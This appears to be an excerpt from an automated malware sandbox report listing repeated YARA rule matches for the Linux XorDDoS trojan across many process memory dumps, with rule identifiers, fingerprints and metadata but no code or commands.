Source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
